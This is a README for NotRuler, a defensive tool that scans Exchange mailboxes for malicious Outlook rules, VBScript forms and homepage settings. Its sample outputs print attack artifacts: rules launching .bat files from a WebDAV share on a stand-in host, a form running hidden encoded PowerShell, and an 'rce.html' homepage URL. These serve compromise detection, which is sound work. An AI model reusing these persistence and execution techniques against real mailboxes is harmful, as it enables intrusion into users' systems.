sensepost / Notruler
Programming Languages
Projects that are alternatives of or similar to Notruler
Introduction
NotRuler is the opposite of Ruler. The tool aims to make life a little easier for Exchange Admins by allowing for the detection of both client-side rules and VBScript enabled forms. At a miminum this should allow for the detection of all attacks created through Ruler.
NotRuler allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol.
What does it do?
NotRuler can query one or more Exchange mailboxes and detects client-side Outlook rules and VBScript enabled forms.
- Allows Exchange Admins to check for compromise
- Check your own account for compromise
- Extract stager address for Malicious rules
- Extract VBScript used in forms
- Check for 'homepage' and extract URL
Getting Started
Compiled binaries for Linux, OSX and Windows are available. Find these in Releases information about setting up Ruler from source is found in the [getting-started guide].
Usage
NotRuler has two modes of operation:
- Rules -- check for client-side rules
- Forms -- check for VBScript enabled forms
- Homepage -- check for a custom homepage
Rules
The current version of NotRuler can check either a single or multiple mailboxes. These are supplied in the program arguments.
To check multiple mailboxes, create a file with one account per line:
[email protected]
[email protected]
[email protected]
[email protected]
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list rules
You can also check your own account by using --self
./notruler --username [email protected] --mailbox [email protected] --self rules
Sample output:
[+] Checking [[email protected]]
[+] Found 5 rules
[WARNING] Found client-side rule: [01000000d97851c4:pewpew3] Application: [\\myhost.somewhere.darkside.com\dav\morebad.bat]
[WARNING] Found client-side rule: [01000000d97851b9:pewpew] Application: [\\myhost.somewhere.darkside.com\dav\bad.bat]
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
[+] Checking [[email protected]]
[+] No Rules Found
Forms
Same as with Rules, you need to either have a list of mailboxes or a single mailbox to check. Simply swap "rules" for "forms":
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list forms
You can also check your own account by using --self
./notruler --username [email protected] --mailbox [email protected] --self forms
Sample output:
[+] Checking [[email protected]]
[WARNING] Found form with VBScript! [IPM.Note.badform]
Function P()
CreateObject("Wscript.Shell").Run "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAHgAcABlAGMAVAAxADAAMABDAG8ATgB0AGkATgBVAEUAIA=="
[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
Homepage
And the same again, you need to either have a list of mailboxes or a single mailbox to check.
Using the Exchange Admin account, you should be able to log into any mailbox on the Exchange server:
./notruler --username exchangeadmin --mailboxes /path/to/mailbox.list homepage
You can also check your own account by using --self
./notruler --username [email protected] --mailbox [email protected] --self homepage
Sample output:
[+] Checking [[email protected]]
[WARNING] Found endpoint: http://attack.attackpew.com/rce.html
[+] Webview is set as ENABLED
[+] Checking [[email protected]]
[+] Checking [[email protected]]
[+] Checking [[email protected]]
IOCs
I've added a list of IOC's here: iocs.md
Feel free to submit Issues/PRs with further IOCs!
License
NotRuler is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0/) Permissions beyond the scope of this license may be available at http://sensepost.com/contact/.